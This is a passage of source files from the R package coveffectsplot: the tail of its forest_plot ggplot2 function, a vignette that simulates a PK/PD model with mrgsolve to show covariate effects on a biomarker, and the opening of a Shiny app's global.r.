ggplot2::annotate(
"rect",
xmin = ref_value*min(ref_area),
xmax = ref_value*max(ref_area),
ymin = -Inf,
ymax = Inf,
fill = ref_area_col
) +
ggplot2::geom_ribbon(
data = data.frame(x = ref_value, ymax = ref_value, ymin = ref_value,
fill = area_legend_text),
ggplot2::aes(
x = x,
ymax = ymax,
ymin = ymin,
fill = fill
),
size = 1,
inherit.aes = FALSE
)
}
# fake ribbon for fill legend
if (show_ref_value) {
main_plot <- main_plot +
ggplot2::geom_vline(
ggplot2::aes(xintercept = ref_value, linetype = ref_legend_text),
size = 1, color = ref_value_col
)
}
main_plot <- main_plot+
ggstance::geom_pointrangeh(
position = ggstance::position_dodgev(height = vertical_dodge_height),
ggplot2::aes_string(color = "pointintervalcolor"),
size = 1,
alpha = 0.8
)+
ggplot2::scale_colour_manual("", breaks = colbreakvalues,
values = c(interval_col,bsv_col)) +
ggplot2::scale_linetype_manual("", breaks = ref_legend_text, values = 2) +
ggplot2::scale_fill_manual("", breaks = area_legend_text, values = ref_area_col)+
ggplot2::guides(colour = guide_interval,
linetype = guide_linetype,
fill = guide_fill,
shape = guide_shape )
if (!show_ref_area) {
main_plot <- main_plot +
ggplot2::guides(colour = guide_interval,
linetype = guide_linetype,
shape = guide_shape,
fill = NULL)
}
main_plot <- main_plot +
ggplot2::aes_string(group = "paramname")
if (paramname_shape) {
main_plot <- main_plot +
ggplot2::aes_string(shape = "paramname")
}
if (facet_switch != "none") {
main_plot <- main_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = facet_switch,
labeller = facet_labeller)
} else {
main_plot <- main_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = NULL,
labeller = facet_labeller)
}
main_plot <- main_plot +
ggplot2::theme_bw(base_size = base_size) +
ggplot2::theme(
axis.text.y = ggplot2::element_text(
angle = 0,
size = y_label_text_size
),
axis.text.x = ggplot2::element_text(size = x_label_text_size),
legend.position = legend_position,
legend.justification = c(0.5, 0.5),
legend.direction = "horizontal",
legend.key.width = ggplot2::unit(3, "line"),
strip.text.x = x.strip.text,
strip.text.y = y.strip.text,
strip.text.y.left = y.strip.text,
panel.grid.minor = ggplot2::element_line(colour = "gray", linetype = "dotted"),
panel.grid.major = ggplot2::element_line(colour = "gray", linetype = "solid"),
strip.background = ggplot2::element_rect(fill = strip_col),
panel.spacing = ggplot2::unit(facet_spacing, "pt"),
strip.placement = strip_placement,
legend.spacing.x = ggplot2::unit(legend_space_x_mult*11, "pt"),
legend.margin = ggplot2::margin(t = legend_margin[1],
r = legend_margin[2],
b = legend_margin[3],
l = legend_margin[4],
unit='pt'),
plot.margin = ggplot2::margin(t = plot_margin[1],
r = plot_margin[2],
b = plot_margin[3],
l = plot_margin[4],
unit='pt')
) +
ggplot2::ggtitle("\n")
if (!strip_outline) {
main_plot <- main_plot +
ggplot2::theme(strip.background=ggplot2::element_blank())
}
if (!show_yaxis_gridlines) {
main_plot <- main_plot +
ggplot2::theme(panel.grid.major.y = ggplot2::element_blank(),
panel.grid.minor.y = ggplot2::element_blank())
}
if (!show_xaxis_gridlines) {
main_plot <- main_plot +
ggplot2::theme(panel.grid.major.x = ggplot2::element_blank(),
panel.grid.minor.x = ggplot2::element_blank())
}
main_plot <- main_plot +
ggplot2::xlab(xlabel)
main_plot <- main_plot +
ggplot2::ylab(ylabel)
if (grepl("^\\s+$", ylabel) ){
main_plot <- main_plot +
ggplot2::theme(axis.title.y=ggplot2::element_blank())
}
if (grepl("^\\s+$", xlabel) ){
main_plot <- main_plot +
ggplot2::theme(axis.title.x=ggplot2::element_blank())
}
main_plot <- main_plot +
ggplot2::scale_x_continuous(trans = ifelse(logxscale,"log","identity"))
if (length(major_x_ticks) || length(minor_x_ticks)) {
main_plot <- main_plot +
ggplot2::scale_x_continuous(trans = ifelse(logxscale,"log","identity"),
breaks = major_x_ticks,
minor_breaks = minor_x_ticks
)
}
if (!is.null(x_range)) {
main_plot <- main_plot +
ggplot2::coord_cartesian(xlim = x_range)
}
if (theme_benrich){
main_plot <- main_plot +
ggplot2::theme(
panel.spacing=ggplot2::unit(0, "pt"),
panel.grid = ggplot2::element_blank(),
panel.grid.minor = ggplot2::element_blank(),
strip.background = ggplot2::element_blank(),
strip.text.y = y.strip.text,
strip.text.y.left = y.strip.text,
strip.text.x= x.strip.text,
plot.margin = ggplot2::margin(t=3,r=3,b=3,l=3,unit="pt")
)
}
if (table_position != "none") {
table_plot <- ggplot2::ggplot(data = data,
ggplot2::aes_string(y = "label"))
table_plot <- table_plot +
ggplot2::aes_string(group = "paramname") +
ggplot2::geom_text(
ggplot2::aes_string(
x = 1,
label = "LABEL",
hjust = 0.5
),
size = table_text_size,
position = ggstance::position_dodgev(height = vertical_dodge_height)
)
if (table_facet_switch != "none") {
table_plot <- table_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = table_facet_switch,
labeller = facet_labeller)
} else {
table_plot <- table_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = NULL,
labeller = facet_labeller)
}
table_plot <- table_plot +
ggplot2::theme_bw(base_size = base_size) +
ggplot2::theme(
axis.text.y = ggplot2::element_text(
angle = 0,
size = y_label_text_size
),
strip.text.x = table.x.strip.text,
axis.text.x = ggplot2::element_text(size = x_label_text_size),
axis.ticks.x= ggplot2::element_blank(),
strip.text.y = table.y.strip.text,
strip.text.y.left = table.y.strip.text,
axis.title.x = ggplot2::element_blank(),
axis.title.y = ggplot2::element_blank(),
panel.grid.major.x = ggplot2::element_blank(),
panel.grid.minor.x = ggplot2::element_blank(),
panel.grid.major.y = ggplot2::element_blank(),
panel.grid.minor.y = ggplot2::element_blank(),
panel.spacing = ggplot2::unit(facet_spacing, "pt"),
strip.background = ggplot2::element_rect(fill = strip_col),
strip.placement = strip_placement,
plot.margin = ggplot2::margin(t = table_margin[1],
r = table_margin[2],
b = table_margin[3],
l = table_margin[4],
unit='pt')
) +
ggplot2::theme(legend.position = "none")+
ggplot2::scale_x_continuous(breaks=c(1),label="",limits =c(0.99, 1.01) )
if (!strip_outline) {
table_plot <- table_plot +
ggplot2::theme(strip.background=ggplot2::element_blank())
}
if (show_table_facet_strip=="none") {
table_plot <- table_plot +
ggplot2::theme(
strip.text.x = ggplot2::element_blank(),
strip.text.y = ggplot2::element_blank(),
strip.text.y.left = ggplot2::element_blank(),
strip.background.x = ggplot2::element_blank(),
strip.background.y = ggplot2::element_blank()
)
}
if (show_table_facet_strip=="y") {
table_plot <- table_plot +
ggplot2::theme(
strip.text.x = ggplot2::element_blank(),
strip.background.x = ggplot2::element_blank()
)
}
if (show_table_facet_strip=="x") {
table_plot <- table_plot +
ggplot2::theme(
strip.text.y = ggplot2::element_blank(),
strip.text.y.left = ggplot2::element_blank(),
strip.background.y = ggplot2::element_blank()
)
}
if (!show_table_yaxis_tick_label) {
table_plot <- table_plot +
ggplot2::theme(
axis.title.y = ggplot2::element_blank(),
axis.text.y = ggplot2::element_blank(),
axis.ticks.y = ggplot2::element_blank()
)
}
if (!reserve_table_xaxis_label_space) {
table_plot <- table_plot +
ggplot2::theme(
axis.text.x= ggplot2::element_blank(),
axis.ticks.x= ggplot2::element_blank()
)
}
if (!table_panel_border) {
table_plot <- table_plot +
ggplot2::theme(
panel.border = ggplot2::element_blank()
)
}
if (theme_benrich){
table_plot <- table_plot +
ggplot2::ggtitle(table_title)+
ggplot2::theme(
plot.title=ggplot2::element_text(
size=table_title_size,hjust=0.5, vjust=1,margin=
ggplot2::margin(b=ggplot2::unit(6, "pt"))),
strip.background=ggplot2::element_blank(),
panel.border = ggplot2::element_blank(),
panel.spacing = ggplot2::unit(0, "pt"),
axis.ticks = ggplot2::element_blank(),
plot.margin = ggplot2::margin(t=3,r=3,b=3,l=3,unit="pt")
)
if (show_table_facet_strip %in% c("y")) {
table_plot <- table_plot +
ggplot2::theme(
strip.text.y= table.y.strip.text
)
}
if (show_table_facet_strip %in% c("x")) {
table_plot <- table_plot +
ggplot2::theme(
strip.text.x = table.x.strip.text
)
}
if (show_table_facet_strip %in% c("both")) {
table_plot <- table_plot +
ggplot2::theme(
strip.text.y= table.y.strip.text,
strip.text.x= table.x.strip.text
)
}
}
}
if (table_position == "none") {
result <- main_plot
} else if (table_position == "right") {
result <- egg::ggarrange(
main_plot,
table_plot,
nrow = 1,
widths = c(plot_table_ratio, 1)
)
} else if (table_position == "below") {
result <- egg::ggarrange(
main_plot,
table_plot,
nrow = 2,
heights = c(plot_table_ratio, 1)
)
}
if (return_list){
result <- list(main_plot,table_plot)
}
if (!return_list){
result <- result
}
result
}
<file_sep>/vignettes/PKPD_Example.Rmd
---
title: "PK/PD Model: Assessing the Impact of Covariates on a Biomarker"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{PKPD_Example}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
warning =FALSE,
message =FALSE,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(mrgsolve)
library(ggplot2)
library(ggstance)
library(ggridges)
library(tidyr)
library(dplyr)
library(table1)
library(patchwork)
library(data.table)
theme_set(theme_bw())
#utility function to simulate varying one covariate at a time keeping the rest at the reference
expand.modelframe <- function(..., rv, covcol="covname") {
args <- list(...)
df <- lapply(args, function(x) x[[1]])
df[names(rv)] <- rv
res <- lapply(seq_along(rv), function(i) {
df[[covcol]] <- names(rv)[i]
df[[names(rv)[i]]] <- args[[names(rv)[i]]]
as.data.frame(df)
})
do.call(rbind, res)
}
cor2cov <- function (cor, sd)
{
if (missing(sd)) {
sd <- diag(cor)
}
diag(cor) <- 1
n <- nrow(cor)
diag(sd, n) %*% cor %*% diag(sd, n)
}
nbsvsubjects <- 100
nsim <- 100 # uncertainty replicates for vignette you might want a higher number
round_pad <- function(x, digits = 2, round5up = TRUE) {
eps <- if (round5up) x * (10^(-(digits + 3))) else 0
formatC(round(x + eps, digits), digits = digits, format = "f", flag = "0")
}
```
## Specifying a PK/PD Model using `mrgsolve`
Here we use the same two-compartment PK model linked to an indirect response PD model with the drug inhibiting the rate constant of input (Kin). The model included several covariates effects on Clearance, Volume and Kin. The baseline PD value is controlled by the ratio of Kin/Kout.
```{r pkpdmodel, collapse=TRUE }
codepkpdmodelcov <- '
$PARAM @annotated
KA : 0.5 : Absorption rate constant Ka (1/h)
CL : 4 : Clearance CL (L/h)
V : 10 : Central volume Vc (L)
Vp : 50 : Peripheral volume Vp (L)
Qp : 10 : Intercompartmental clearance Q (L/h)
CLALB : -0.8 : Ablumin on CL (ref. 45 g/L)
CLSEX : 0.2 : Sex on CL (ref. Female)
CLWT : 1 : Weight on CL (ref. 85 kg)
VSEX : 0.07 : Sex on Vc (ref. Female)
VWT : 1 : Weight on Vc (ref. 85 kg)
KIN : 3 : Zero-order Rate constant of biomarker production (amount/h)
KOUT : 0.06 : First-order Rate constant of biomarker loss (1/h)
IC50 : 3 : Drug concentration producing 50% of maximum inhibition
IMAX : 0.999 : Maximum Inhibition Response
gamma : 0.55 : Sigmoidicity factor of the sigmoid Emax equation
KINWT : 0.4 : Weight on KIN (ref. 85 kg)
KINAGE : -0.08 : Age on KIN (ref. 40 years)
KINHLTY: 1.5 : Weight on CL (ref. 85 kg)
$PARAM @annotated // reference values for covariate
WT : 85 : Weight (kg)
SEX : 0 : Sex (0=Female, 1=Male)
ALB : 45 : Albumin (g/L)
AGE : 40 : Age (years)
HEALTHY: 0 : Health Status (0=Diseased, 1=Healthy)
$CMT GUT CENT PER RESP
$GLOBAL
#define CP (CENT/Vi)
#define CPER (PER/Vpi)
#define INH (IMAX*pow(CP,gamma)/(pow(IC50,gamma)+pow(CP,gamma)))
#define PDRESP RESP
$MAIN
double KAi = KA;
double Vpi = Vp *pow((WT/70.0), 1);
double Qpi = Qp *pow((WT/70.0), 0.75);
double CLi = CL *
pow((ALB/45.0), CLALB)*
(SEX == 1.0 ? (1.0+CLSEX) : 1.0)*
pow((WT/85.0), CLWT)*exp(ETA(1));
double Vi = V *
(SEX == 1.0 ? (1.0+VSEX) : 1.0)*
pow((WT/85.0), VWT)*exp(ETA(2));
double KINi = KIN *
pow((AGE/40), KINAGE)*
(HEALTHY == 1.0 ? KINHLTY : 1.0)*
pow((WT/85.0), KINWT)*exp(ETA(3));
double RESP_0 = KINi/KOUT;
$OMEGA
0.09
0.01 0.09
$OMEGA
0.25
$ODE
dxdt_GUT = -KAi *GUT;
dxdt_CENT = KAi *GUT - (CLi+Qpi)*CP + Qpi*CPER;
dxdt_PER = Qpi*CP - Qpi*CPER;
dxdt_RESP = KINi*(1-INH) - KOUT*RESP;
$CAPTURE CP PDRESP KAi CLi Vi Vpi Qpi WT SEX ALB AGE HEALTHY
'
modpkpdsim <- mcode("codepkpdmodelcov", codepkpdmodelcov)
partab <- setDT(modpkpdsim@annot$data)[block=="PARAM", .(name, descr, unit)]
partab <- merge(partab, melt(setDT(modpkpdsim@param@data), meas=patterns("*"), var="name"))
knitr::kable(partab)
```
### Simulate Reference Subjects with BSV
We simulate at reference covariate values with between subject variability (BSV) and then we show a plot of the PK and PD profiles of five random subjects.
```{r pkpdsimulation, fig.width=7,fig.height=4, message=FALSE }
idata <- data.table(ID=1:nbsvsubjects, WT=85, SEX=0, ALB=45, AGE=40, HEALTHY = 0)
ev1 <- ev(time = 0, amt = 100, cmt = 1, ii = 24, addl = 20)
data.dose <- ev(ev1)
data.dose <- setDT(as.data.frame(data.dose))
data.all <- data.table(idata, data.dose)
set.seed(678549)
outputpkpdsim <- modpkpdsim %>%
data_set(data.all) %>%
mrgsim(end = 28*24, delta = 0.25) %>%
as.data.frame %>%
as.data.table
outputpkpdsim$HEALTHY <- as.factor(outputpkpdsim$HEALTHY)
yvar_names <- c(
'CP'="Plasma Concentrations",
'RESP'="PD Values"
)
set.seed(678549)
outputpkpdsimlong <- outputpkpdsim[outputpkpdsim$ID %in%
sample(unique(outputpkpdsim$ID), 5), ] %>%
gather(key,value,CP,RESP)
ggplot(data =outputpkpdsimlong ,
aes(time, value, group = ID)) +
geom_line(alpha = 0.8, size = 0.3) +
facet_grid(key ~ID,scales="free_y",switch="y",
labeller = labeller(key=yvar_names)) +
labs(y = "", color = "Sex", x = "Time (h)")+
theme(strip.placement = "outside",
axis.title.y=element_blank())
```
### Compute PD Parameters and Summarize BSV
Here we compute the PD baseline (where we start), nadir response (minimum response achieved) and the delta (difference) between the baseline and nadir. We then summarize and report the BSV around these parameters as ranges of 50 and 90% of patients. We then show a plot of the first 10 replicates as an example of the simulated PD profiles. Since the code is similar to the PK Example vignette it is not shown.
```{r computenca , fig.width=7, message=FALSE }
derive.exposure <- function(time, PDRESP) {
x <- c(
nadir = min(PDRESP, na.rm = TRUE),
baselinepd = PDRESP[1L],
deltapd = PDRESP[1L]-min(PDRESP, na.rm = TRUE)
)
data.table(paramname=names(x), paramvalue=x)
}
refbsv <- outputpkpdsim[, derive.exposure(time, PDRESP),
by=.(ID, WT, SEX, ALB, AGE, HEALTHY)]
refbsv[, stdparamvalue := paramvalue/median(paramvalue), by=paramname]
bsvranges <- refbsv[,list(
P05 = quantile(stdparamvalue, 0.05),
P25 = quantile(stdparamvalue, 0.25),
P50 = quantile(stdparamvalue, 0.5),
P75 = quantile(stdparamvalue, 0.75),
P95 = quantile(stdparamvalue, 0.95)), by = paramname]
bsvranges
```
```{r pd1, fig.width=7,fig.height=4, include=FALSE }
# set.seed(678549)
# outputpkpdsimlong <- outputpkpdsim %>%
# gather(key,value,CP,RESP)
# outputpkpdsimlong$SEX <- as.factor(outputpkpdsimlong$SEX )
# outputpkpdsimlong$SEX <- factor(outputpkpdsimlong$SEX, labels=c("Female"))
# pd1<- ggplot(data =outputpkpdsimlong ,
# aes(time/24, value, group = ID)) +
# geom_line(alpha = 0.1, size = 0.3) +
# facet_grid(key ~WT+ALB+SEX,scales="free_y",switch="y",
# labeller = labeller(key=yvar_names, WT= label_both,
# ALB= label_both,SEX= label_both,.multi_line = FALSE)) +
# labs(y = "", color = "Sex", x = "Time (days)")+
# theme_bw(base_size=18)+
# theme(strip.placement = "outside",
# axis.title.y=element_blank())
# pd1
# ggsave("pd1.png", device="png",type="cairo-png", width = 7, height = 5.5,dpi=72)
# p4 <- ggplot(refbsv,
# aes(x=stdparamvalue,y=paramname,fill=factor(..quantile..),height=..ndensity..))+
# facet_wrap(~paramname,scales="free_y",ncol=1)+
# stat_density_ridges(
# geom = "density_ridges_gradient", calc_ecdf = TRUE,
# quantile_lines = TRUE, rel_min_height = 0.001,scale=0.9,
# quantiles = c(0.05,0.25,0.5,0.75, 0.95)) +
# scale_fill_manual(
# name = "Probability", values = c("white","#FF000050","#FF0000A0", "#FF0000A0","#FF000050","white"),
# labels = c("(0, 0.05]", "(0.05, 0.25]",
# "(0.25, 0.5]","(0.5, 0.75]",
# "(0.75, 0.95]","(0.95, 1]")
# )+
# theme_bw(base_size=22)+
# theme(legend.position = "none",
# axis.text.y=element_blank(),axis.ticks.y = element_blank())+
# labs(x="Standardized PD Parameters",y="")+
# scale_x_log10()+
# coord_cartesian(expand = FALSE)
# p4
# ggsave("pd2.png", device="png",type="cairo-png")
#
# p4 <- p4+theme_bw(base_size=18) +
# theme(
# axis.title.x =element_text(size=12),
# legend.position = "none",
# strip.background = element_blank(),
# strip.text = element_blank(),
# panel.spacing = unit(10,"mm"),
# plot.margin = margin(0,10,0,0))
# pd1 <- pd1+theme_bw(base_size=18) +
# theme(plot.margin = margin(0,0,0,10),
# strip.placement = "outside",
# axis.title.y=element_blank())
# png("Figure_S_PD_1.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(pd1 ,p4,widths = c(2,1.5),ncol=2)
# dev.off()
```
## Construct ans Simulate at Combinations of Covariate of Interest
Similarly to the PK Example vignette we generate covariate combinations of interest and we simulate with uncertainty using an invented varcov matrix.
```{r covcomb , fig.width=7}
reference.values <- data.frame(WT = 85, ALB = 45, AGE = 40, SEX = 0, HEALTHY = 0)
covcomb <- expand.modelframe(
WT = c(56,128),
AGE = c(20,60),
ALB = c(40,50),
SEX = c(1),#Refernce is for SEX =0
HEALTHY = c(1),#Refernce is for HEALTHY =0
rv = reference.values)
# Add the reference
covcomb <- rbind(covcomb, data.table(reference.values, covname="REF"))
covcomb$ID <- 1:nrow(covcomb)
covcomb
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1, ii = 24, addl = 20)
data.dose <- as.data.frame(ev1)
data.all <- data.table(idata, data.dose)
outcovcomb<- modpkpdsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(start=0,end=24*28,delta=0.25)%>%
as.data.frame %>%
as.data.table
outcovcomb$SEX <- as.factor(outcovcomb$SEX )
outcovcomb$SEX <- factor(outcovcomb$SEX, labels=c("Female", "Male"))
outcovcomb$HEALTHY <- as.factor(outcovcomb$HEALTHY )
theta <- unclass(as.list(param(modpkpdsim)))
theta[c("WT", "SEX", "ALB","AGE","HEALTHY")] <- NULL
theta <- unlist(theta)
as.data.frame(t(theta))
varcov <- cor2cov(
matrix(0.2, nrow=length(theta), ncol=length(theta)),
sd=theta*0.15)
rownames(varcov) <- colnames(varcov) <- names(theta)
as.data.frame(varcov)
set.seed(678549)
# mvtnorm::rmvnorm is another option that can be explored
sim_parameters <- MASS::mvrnorm(nsim, theta, varcov, empirical=T) %>% as.data.table
head(sim_parameters)
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1, ii = 24, addl = 20)
data.dose <- as.data.frame(ev1)
iter_sims <- NULL
for(i in 1:nsim) {
data.all <- data.table(idata, data.dose, sim_parameters[i])
out <- modpkpdsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(start=0, end=28*24, delta=0.25) %>%
as.data.frame %>%
as.data.table
out[, rep := i]
iter_sims <- rbind(iter_sims, out)
}
iter_sims$SEX <- as.factor(iter_sims$SEX )
iter_sims$SEX <- factor(iter_sims$SEX, labels=c("Female", "Male"))
```
```{r, fig.width=7, fig.height=6, message=FALSE, warning=FALSE}
pdprofiles <- ggplot(iter_sims[iter_sims$rep<=10,], aes(time/24,PDRESP,col=factor(WT),linetype=factor(HEALTHY) ) )+
geom_line(aes(group=interaction(ID,rep)),alpha=0.3,size=0.3)+
geom_line(data=outcovcomb,aes(group=interaction(ID)),color="black")+
facet_grid(SEX+ALB~ AGE+WT,labeller = label_both)+
labs(linetype="No Uncertainty\nHealthy",
colour="Uncertainty\nReplicates\n(1 to 10)\nWeight (kg)",
caption ="Simulation\nwith Uncertainty without BSV" ,
x="Days", y = "PD Values")+
guides(colour = guide_legend(override.aes = list(alpha = 1)))
pdprofiles
```
### Compute PD Parameters and Distributions Plots
Similar to the above we compute the PD parameters, standardize by the median and provide a plot. Since the code is similar to the PK Example vignette it is not shown.
```{r, fig.width=7,fig.height=6, include=FALSE, message=FALSE}
out.df.univariatecov.nca <- iter_sims[, derive.exposure(time, PDRESP),
by=.(rep, ID, WT, SEX, ALB, AGE, HEALTHY)]
out.df.univariatecov.nca
refvalues <- out.df.univariatecov.nca[
ALB==45 & WT==85 & SEX=="Female"& AGE==40 & HEALTHY==0,
.(medparam = median(paramvalue)), by=paramname]
refvalues
covcomb <- as.data.table(covcomb)
covcomb[covname=="WT", covvalue := paste(WT,"kg")]
covcomb[covname=="ALB", covvalue := paste(ALB,"g/L")]
covcomb[covname=="AGE", covvalue := paste(AGE,"years")]
covcomb[covname=="SEX", covvalue := "Male"]
covcomb[covname=="HEALTHY", covvalue := "Diseased"]
covcomb[covname=="REF", covvalue := "85 kg-Female-45 g/L-40 years-healthy"]
covcomb
covcomb[covname=="REF", covvalue := "85 kg-Female\n45 g/L-40 years\nhealthy"]
covcomb <- as.data.table(covcomb)
out.df.univariatecov.nca <- merge(
out.df.univariatecov.nca,
covcomb[, .(ID, covname, covvalue)])
setkey(out.df.univariatecov.nca, paramname)
setkey(refvalues, paramname)
out.df.univariatecov.nca <- merge(out.df.univariatecov.nca,refvalues)
out.df.univariatecov.nca[, paramvaluestd := paramvalue/medparam]
out.df.univariatecov.nca$covvalue <-factor(as.factor(out.df.univariatecov.nca$covvalue ),
levels = c("56 kg",
"85 kg",
"128 kg",
"Male",
"40 g/L",
"50 g/L",
"20 years",
"60 years",
"Diseased",
"85 kg-Female\n45 g/L-40 years\nhealthy")
)
out.df.univariatecov.nca$covname2 <- as.factor(out.df.univariatecov.nca$covname2)
out.df.univariatecov.nca$covname2 <- factor(out.df.univariatecov.nca$covname2,
levels= c( "Weight", "Sex",
"Albumin","Age", "Healthy",
"Reference")
)
boxplotdat <- out.df.univariatecov.nca
boxplotdat[covname=="WT", covname2 := "Weight"]
boxplotdat[covname=="ALB", covname2 := "Albumin"]
boxplotdat[covname=="SEX", covname2 := "Sex"]
boxplotdat[covname=="AGE", covname2 := "Age"]
boxplotdat[covname=="HEALTHY", covname2 := "Healthy"]
boxplotdat[covname=="REF", covname2 := "Reference"]
```
```{r, fig.width=7, fig.height=5, message=FALSE}
boxplotpd <- ggplot(boxplotdat,
aes(x=covvalue ,y=paramvalue))+
facet_grid(paramname ~covname2,scales="free",switch="both",
labeller = label_parsed)+
geom_boxplot()+
theme(axis.title = element_blank(),strip.placement = "outside")+
labs(y="PD Parameter Values",x="Covariate Value")
boxplotpd
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# pdprofiles<- pdprofiles+theme(axis.title.y = element_text(size=15))+
# guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)),
# linetype=guide_legend(override.aes = list(size=0.5)))
# pdprofiles
# ggsave("pd3.png", device="png",type="cairo-png",width= 7, height = 5,dpi=72)
# boxplotpd
# ggsave("pd4.png", device="png",type="cairo-png",width= 7, height = 4,dpi=2*72)
# png("Figure_S_PD_2.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(pdprofiles,boxplotpd,nrow=1)
# dev.off()
```
```{r, fig.width=7,fig.height=5,message=FALSE}
pdggridges<- ggplot(out.df.univariatecov.nca,
aes(x=paramvaluestd,y=covvalue,fill=factor(..quantile..),height=..ndensity..))+
facet_grid(covname2~paramname,scales="free_y",space="free")+
annotate( "rect",
xmin = 0.5,
xmax = 2,
ymin = -Inf,
ymax = Inf,
fill = "gray",alpha=0.4
)+
stat_density_ridges(
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.001,scale=0.9,
quantiles = c(0.05,0.5, 0.95)) +
scale_fill_manual(
name = "Probability", values = c("white", "#0000FFA0","#0000FFA0", "white"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")
)+
geom_vline( aes(xintercept = 1),size = 1)+
theme_bw()+
labs(x="Effects Relative to Parameter Reference value",y="")+
scale_x_continuous(breaks=c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25))+
scale_x_log10()
pdggridges
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# pdggridges+theme(legend.position = "none")
# ggsave("Figure_S_PD_3.png", device="png",type="cairo-png",
# width= 7, height = 5,dpi=72)
```
### Summarize, add BSV and Use `forest_plot`
We will show how a multiple parameters, multiple covariates plot and table can be done.
```{r, fig.width=7, fig.height=7 ,message=FALSE}
coveffectsdatacovrep <- out.df.univariatecov.nca %>%
dplyr::group_by(paramname,covname,covvalue) %>%
dplyr::summarize(
mid= median(paramvaluestd),
lower= quantile(paramvaluestd,0.05),
upper = quantile(paramvaluestd,0.95))
coveffectsdatacovreplabel<- coveffectsdatacovrep %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
```
```{r, fig.width=7, fig.height=7 ,message=FALSE}
setkey(bsvranges, paramname)
coveffectsdatacovrepbsv <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv$covname <- "BSV"
coveffectsdatacovrepbsv$covvalue <- "50% of patients"
coveffectsdatacovrepbsv$label <- "50% of patients"
coveffectsdatacovrepbsv$lower <- bsvranges$P25
coveffectsdatacovrepbsv$upper <- bsvranges$P75
coveffectsdatacovrepbsv2 <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv2$covname <- "BSV"
coveffectsdatacovrepbsv2$covvalue <- "90% of patients"
coveffectsdatacovrepbsv2$label <- "90% of patients"
coveffectsdatacovrepbsv2$lower <- bsvranges$P05
coveffectsdatacovrepbsv2$upper <- bsvranges$P95
coveffectsdatacovrepbsv<- rbind(coveffectsdatacovrep,coveffectsdatacovrepbsv,coveffectsdatacovrepbsv2)
coveffectsdatacovrepbsv <- coveffectsdatacovrepbsv %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
coveffectsdatacovrepbsv<- as.data.frame(coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv$label <- as.factor(coveffectsdatacovrepbsv$covvalue )
coveffectsdatacovrepbsv$label <- reorder(coveffectsdatacovrepbsv$label,
coveffectsdatacovrepbsv$lower)
coveffectsdatacovrepbsv$covname <-factor(as.factor(coveffectsdatacovrepbsv$covname ),levels =c("WT","SEX","ALB","AGE","HEALTHY", "REF", "BSV"),
labels= c("Weight","Sex","Albumin","Age","Healthy", "Reference", "BSV")
)
interval_legend_text <- "Median (points)\n90% CI (horizontal lines)"
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
ref_legend_text <- "Reference\n(vertical line)\nClinically relevant limits\n(gray area)"
area_legend_text <- "Reference\n(vertical line)\nClinically relevant limits\n(gray area)"
png("./Figure_S_PD_4.png",width =12 ,height = 9,units = "in",res=72)
coveffectsplot::forest_plot(coveffectsdatacovrepbsv,
ref_area = c(0.5, 1/0.5),
x_range = c(0.25,4),
strip_placement = "outside",
base_size = 16,
y_label_text_size = 12,
xlabel = "Fold Change Relative to Reference",
ref_legend_text = ref_legend_text,
area_legend_text =area_legend_text,
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname~paramname",
facet_switch = "y",
facet_scales = "free_y",
facet_space = "fixed",
paramname_shape = FALSE,
table_position = "below",
table_text_size=4,
plot_table_ratio = 1,
table_facet_switch = "both",
show_table_facet_strip = "both",
show_table_yaxis_tick_label = TRUE,
logxscale = TRUE,
major_x_ticks = c(0.5,1,1/0.5),
table_margin = c(0,5.5,0,0),
plot_margin =c(0,5.5,0,0),
reserve_table_xaxis_label_space = FALSE,
return_list = FALSE)
dev.off()
# consider returning a list and editing the y axis label line breaks height
# theme(axis.text.y = element_text(lineheight = ))
```

<file_sep>/inst/shiny/global.r
suppressPackageStartupMessages({
library(coveffectsplot)
library(dplyr)
library(tidyr)
library(egg)
library(ggplot2)
library(ggstance)
library(shiny)
library(shinyjs)
library(markdown)
library(colourpicker)
library(shinymeta)
})
escape_newline <- function(s) {
gsub("\\\\n", "\\\n", s)
}
round_pad <- function(x, digits = 2, round5up = TRUE) {
eps <- if (round5up) x * (10^(-(digits + 3))) else 0
formatC(round(x + eps, digits), digits = digits, format = "f", flag = "0")
}
###from table1
signif_pad <- function (x, digits = 3, round.integers = TRUE, round5up = TRUE)
{
eps <- if (round5up)
x * (10^(-(digits + 3)))
else 0
if (round.integers) {
cx <- as.character(signif(x + eps, digits))
}
else {
